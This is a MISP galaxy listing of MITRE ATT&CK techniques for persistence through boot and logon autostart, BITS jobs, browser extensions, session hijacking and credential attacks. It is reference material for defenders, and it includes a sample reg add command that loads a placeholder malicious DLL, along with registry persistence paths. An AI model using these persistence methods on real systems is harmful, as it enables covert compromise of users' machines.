Adversaries may abuse BITS to download (e.g. Ingress Tool Transfer), execute, and even clean up after running malicious code (e.g. Indicator Removal). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.[CTU BITS Malware June 2016][Mondok Windows PiggyBack BITS May 2007][Symantec BITS May 2007] BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).[PaloAlto UBoatRAT Nov 2017][CTU BITS Malware June 2016]

BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.[CTU BITS Malware June 2016]

Internal MISP references

UUID 6b278e5d-7383-42a4-9425-2da79bbe43e0 which can be used as unique global reference for BITS Jobs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Active Setup

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.[Klein Active Setup 2010] These programs will be executed under the context of the user and will have the account's associated permissions level.

Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.[Mandiant Glyer APT 2010][Citizenlab Packrat 2015][FireEye CFR Watering Hole 2012][SECURELIST Bright Star 2015][paloalto Tropic Trooper 2016]

Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Internal MISP references

UUID 8bd564d2-a3f1-4367-8631-a2d2cb3a1f46 which can be used as unique global reference for Active Setup in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.014
Related clusters

To see the related clusters, click here.

Authentication Package

Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[MSDN Authentication Packages]

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.

Internal MISP references

UUID 7ede5868-1109-4f22-abc7-9495658f7866 which can be used as unique global reference for Authentication Package in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.002
Related clusters

To see the related clusters, click here.

Kernel Modules and Extensions

Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.[Linux Kernel Programming] 

When used maliciously, LKMs can be a type of kernel-mode Rootkit that run with the highest operating system privilege (Ring 0).[Linux Kernel Module Programming Guide] Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.[iDefense Rootkit Overview]

Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.[System and kernel extensions in macOS]

Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.[Apple Kernel Extension Deprecation]

Adversaries can use LKMs and kexts to conduct Persistence and/or Privilege Escalation on a system. Examples have been found in the wild, and there are some relevant open source projects as well.[Volatility Phalanx2][CrowdStrike Linux Rootkit][GitHub Reptile][GitHub Diamorphine][RSAC 2015 San Francisco Patrick Wardle][Synack Secure Kernel Extension Broken][Securelist Ventir][Trend Micro Skidmap]

Internal MISP references

UUID 74e2b24b-3bf7-4361-bc07-983bffe674f7 which can be used as unique global reference for Kernel Modules and Extensions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.006
Related clusters

To see the related clusters, click here.

Login Items

Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.[Open Login Items Apple] Login items can be added via a shared file list or Service Management Framework.[Adding Login Items] Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.

Login items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.[Adding Login Items][SMLoginItemSetEnabled Schroeder 2013] Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.[Launch Services Apple Developer] Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.

Adversaries can utilize AppleScript and Native API calls to create a login item to spawn malicious executables.[ELC Running at startup] Prior to version 10.5 on macOS, adversaries can add login items by using AppleScript to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.[Login Items AE] Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.[Startup Items Eclectic][hexed osx.dok analysis 2019][Add List Remove Login Items Apple Script] This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.[Startup Items Eclectic] Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.[objsee mac malware 2017][CheckPoint Dok][objsee netwire backdoor 2019]

Internal MISP references

UUID 6556e1cb-87d0-4e67-9d5c-343d1eddf430 which can be used as unique global reference for Login Items in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.015
Related clusters

To see the related clusters, click here.

LSASS Driver

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.[Microsoft Security Subsystem]

Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., Hijack Execution Flow), an adversary can use LSA operations to continuously execute malicious payloads.

Internal MISP references

UUID bce86020-2851-4b01-97a9-e51a6b23ea68 which can be used as unique global reference for LSASS Driver in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.008
Related clusters

To see the related clusters, click here.

Port Monitors

Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.[AddMonitor] This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.[Bloxham] Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.

The Registry key contains entries for the following:

  • Local Port
  • Standard TCP/IP Port
  • USB Monitor
  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

Internal MISP references

UUID ffd9430b-c727-47f4-a1f0-b1d4f8c29740 which can be used as unique global reference for Port Monitors in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.010
Related clusters

To see the related clusters, click here.

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.[Microsoft Intro Print Processors]

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver Registry key that points to the DLL.

For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.[Microsoft AddPrintProcessor May 2018] After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.[ESET PipeMon May 2020]

The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.

Internal MISP references

UUID f7544b99-d596-43dd-ab12-3844756f3ad7 which can be used as unique global reference for Print Processors in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.012
Related clusters

To see the related clusters, click here.

Registry Run Keys / Startup Folder

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.[Microsoft Run Key] These programs will be executed under the context of the user and will have the account's associated permissions level.

The following run keys are created by default on Windows systems:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Run keys may exist under multiple hives.[Microsoft Wow6432Node 2018][Malwarebytes Wow6432Node 2016] The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.[Microsoft Run Key] For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" [Oddvar Moe RunOnceEx Mar 2018]

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.

The following Registry keys can be used to set startup folder items for persistence:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run automatically for the currently logged-on user.

By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Internal MISP references

UUID 0ca28cc0-89d0-4680-baef-94d7202c6a9b which can be used as unique global reference for Registry Run Keys / Startup Folder in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.001
Related clusters

To see the related clusters, click here.

Re-opened Applications

Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".[Re-Open windows on Mac] When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.[Methods of Mac Malware Persistence][Wardle Persistence Chapter] Applications listed in this file are automatically reopened upon the user’s next logon.

Adversaries can establish Persistence by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.

Internal MISP references

UUID 9459a27a-b892-4864-9916-814130bea485 which can be used as unique global reference for Re-opened Applications in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.007
Related clusters

To see the related clusters, click here.

Security Support Provider

Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.

The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.[Graeber 2014]

Internal MISP references

UUID 8a6ec54e-c7cd-4e3c-b848-21f8be2f864a which can be used as unique global reference for Security Support Provider in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.005
Related clusters

To see the related clusters, click here.

Shortcut Modification

Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.[Shortcut for Persistence ] Although often used as payloads in an infection chain (e.g. Spearphishing Attachment), adversaries may also create a new shortcut as a means of indirection, while also abusing Masquerading to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.

Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. Browser Extensions) to persistently launch malware.

Internal MISP references

UUID bfde0a09-8109-41e4-b8c9-68fe20e8131b which can be used as unique global reference for Shortcut Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.009
Related clusters

To see the related clusters, click here.

Time Providers

Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.[Microsoft W32Time Feb 2018] W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.[Microsoft TimeProvider]

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.[Microsoft TimeProvider] The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.[Microsoft TimeProvider]

Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.[Github W32Time Oct 2017]

Internal MISP references

UUID 2e8cd9a0-846f-416b-80ba-21a15019ce73 which can be used as unique global reference for Time Providers in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.003
Related clusters

To see the related clusters, click here.

Winlogon Helper DLL

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.[Cylance Reg Persistence Sept 2013]

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: [Cylance Reg Persistence Sept 2013]

  • Winlogon\Notify - points to notification package DLLs that handle Winlogon events
  • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
  • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.

Internal MISP references

UUID 6f42559d-fb54-4c82-9ea7-eb9c709dac07 which can be used as unique global reference for Winlogon Helper DLL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.004
Related clusters

To see the related clusters, click here.

XDG Autostart Entries

Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (.desktop) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.[Free Desktop Application Autostart Feb 2006][Free Desktop Entry Keys]

Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the Exec directive in the .desktop configuration file. When the user’s desktop environment is loaded at user login, the .desktop files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the /etc/xdg/autostart directory while the user entries are located in the ~/.config/autostart directory.

Adversaries may combine this technique with Masquerading to blend malicious Autostart entries with legitimate programs.[Red Canary Netwire Linux 2022]

Internal MISP references

UUID 45f107b6-ae8e-49d7-a3fc-ea6437fbac76 which can be used as unique global reference for XDG Autostart Entries in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.013
Related clusters

To see the related clusters, click here.

Boot or Logon Autostart Execution

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.[Microsoft Run Key][MSDN Authentication Packages][Microsoft TimeProvider][Cylance Reg Persistence Sept 2013][Linux Kernel Programming] These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

Internal MISP references

UUID 17b97c19-b986-4653-850a-44aee9aaaba1 which can be used as unique global reference for Boot or Logon Autostart Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Login Hook

Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.[Login Scripts Apple Dev][LoginWindowScripts Apple Dev]

Adversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.[S1 macOs Persistence][Wardle Persistence Chapter]

Note: Login hooks were deprecated in 10.11 version of macOS in favor of Launch Daemon and Launch Agent

Internal MISP references

UUID fdf95fac-f7f2-4901-b5fe-b2bafa443939 which can be used as unique global reference for Login Hook in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.002
Related clusters

To see the related clusters, click here.

Logon Script (Windows)

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.[TechNet Logon Scripts] This is done via adding a path to a script to the HKCU\Environment\UserInitMprLogonScript Registry key.[Hexacorn Logon Scripts]

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

Internal MISP references

UUID b34ba0fd-493c-4e68-91c4-918f495ad07c which can be used as unique global reference for Logon Script (Windows) in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.001
Related clusters

To see the related clusters, click here.

Network Logon Script

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.[Petri Logon Script AD] These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.

Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

Internal MISP references

UUID 3701f955-596b-422e-9fce-09c4f49cf080 which can be used as unique global reference for Network Logon Script in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.003
Related clusters

To see the related clusters, click here.

RC Scripts

Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.

Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.[IranThreats Kittens Dec 2017][Intezer HiddenWasp Map 2019] Upon reboot, the system executes the script's contents as root, resulting in persistence.

Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.[intezer-kaiji-malware]

Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of Launchd. [Apple Developer Doco Archive Launchd][Startup Items] This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.[Methods of Mac Malware Persistence] To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.[Ubuntu Manpage systemd rc]

Internal MISP references

UUID 46ef0f74-b028-4b35-8980-bed066feb60c which can be used as unique global reference for RC Scripts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.004
Related clusters

To see the related clusters, click here.

Startup Items

Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.[Startup Items]

This is technically a deprecated technology (superseded by Launch Daemon), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.[Methods of Mac Malware Persistence] Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.

Internal MISP references

UUID 3d52cd7c-d81b-4762-9749-612bbbccb415 which can be used as unique global reference for Startup Items in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1037.005
Related clusters

To see the related clusters, click here.

Boot or Logon Initialization Scripts

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

Internal MISP references

UUID c51f799b-7305-43db-8d3b-657965cad68a which can be used as unique global reference for Boot or Logon Initialization Scripts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Browser Extensions

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.[Wikipedia Browser Extension][Chrome Extensions Definition]

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.[Malicious Chrome Extension Numbers] Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.

Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.[xorrior chrome extensions macOS]

Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.[Chrome Extension Crypto Miner][ICEBRG Chrome Extensions][Banker Google Chrome Extension Steals Creds][Catch All Chrome Extension]

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.[Stantinko Botnet] There have also been similar examples of extensions being used for command & control.[Chrome Extension C2 Malware]

Internal MISP references

UUID 040804f6-6a87-4011-8716-66682bc16ed4 which can be used as unique global reference for Browser Extensions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Browser Information Discovery

Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.[Kaspersky Autofill]

Browser information may also highlight additional targets after an adversary has access to valid credentials, especially Credentials In Files associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., %APPDATA%/Google/Chrome).[Chrome Roaming Profiles]

Internal MISP references

UUID f1af5c8b-3210-4788-a873-97b1518bb43a which can be used as unique global reference for Browser Information Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Browser Session Hijacking

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.[Wikipedia Man in the Browser]

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.[Cobalt Strike Browser Pivot][ICEBRG Chrome Extensions] Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.

Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as Sharepoint or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.[cobaltstrike manual]

Internal MISP references

UUID b57c5554-5a46-42cd-be7e-4206f79ef424 which can be used as unique global reference for Browser Session Hijacking in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Credential Stuffing

Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:

  • SSH (22/TCP)
  • Telnet (23/TCP)
  • FTP (21/TCP)
  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)
  • LDAP (389/TCP)
  • Kerberos (88/TCP)
  • RDP / Terminal Services (3389/TCP)
  • HTTP/HTTP Management Services (80/TCP & 443/TCP)
  • MSSQL (1433/TCP)
  • Oracle (1521/TCP)
  • MySQL (3306/TCP)
  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.[US-CERT TA18-068A 2018]

Internal MISP references

UUID 6d300882-d404-4f77-a19d-4a2f2b786702 which can be used as unique global reference for Credential Stuffing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1110.004
Related clusters

To see the related clusters, click here.

Password Cracking

Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. OS Credential Dumping can be used to obtain password hashes, this may only get an adversary so far when Pass the Hash is not an option. Further, adversaries may leverage Data from Configuration Repository in order to obtain hashed credentials for network devices.[US-CERT-TA18-106A]

Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.[Wikipedia Password cracking] The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.

Internal MISP references

UUID 7e8c3c70-2e9f-4fa0-b083-ff5610447dc1 which can be used as unique global reference for Password Cracking in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1110.002
Related clusters

To see the related clusters, click here.

Password Guessing

